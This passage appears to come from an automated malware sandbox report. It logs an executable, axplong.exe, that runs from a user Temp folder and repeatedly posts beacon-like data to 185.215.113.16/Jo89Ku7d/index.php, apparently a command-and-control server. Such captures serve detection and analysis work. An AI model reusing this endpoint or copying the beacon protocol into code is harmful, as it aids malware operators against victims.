                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:09.128109932 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.7 | 49713 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:09.243869066 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:10.046972036 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:10.048017025 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:10.276238918 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.7 | 49714 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:10.385418892 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:11.114334106 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:11.116841078 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:11.455925941 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.7 | 49715 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:11.610433102 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:12.360548019 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:12.361239910 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:12.592092991 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.7 | 49716 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:12.712579012 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:13.454965115 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:13.455728054 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:13.682399035 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.7 | 49717 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:13.790092945 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:14.482147932 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:14.483040094 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:14.704719067 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.7 | 49718 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:14.821867943 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:16.039895058 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:16.039928913 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:16.040036917 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:16.040792942 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:16.265012026 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.7 | 49719 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:16.385524988 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:17.152738094 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:17.153491020 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:17.383819103 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.7 | 49720 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:17.493264914 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:18.197046041 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:18.229846954 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:18.451353073 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    14 | 192.168.2.7 | 49721 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:18.575167894 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:19.322673082 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:19.323407888 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:19.553539991 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.7 | 49722 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:19.667047977 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:20.463644981 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:20.464405060 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:20.696082115 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.7 | 49723 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:20.840539932 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:21.609952927 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:21.611404896 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:21.844621897 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.7 | 49724 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:21.962060928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:22.690646887 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:22.691354036 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:22.920526028 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.7 | 49725 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:23.041430950 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:23.728781939 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:29:23.730155945 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Sep 27, 2024 01:29:23.952552080 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    19 | 192.168.2.7 | 49726 | 185.215.113.16 | 80 | 3312 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 27, 2024 01:29:24.072804928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:29:24.797843933 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:29:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
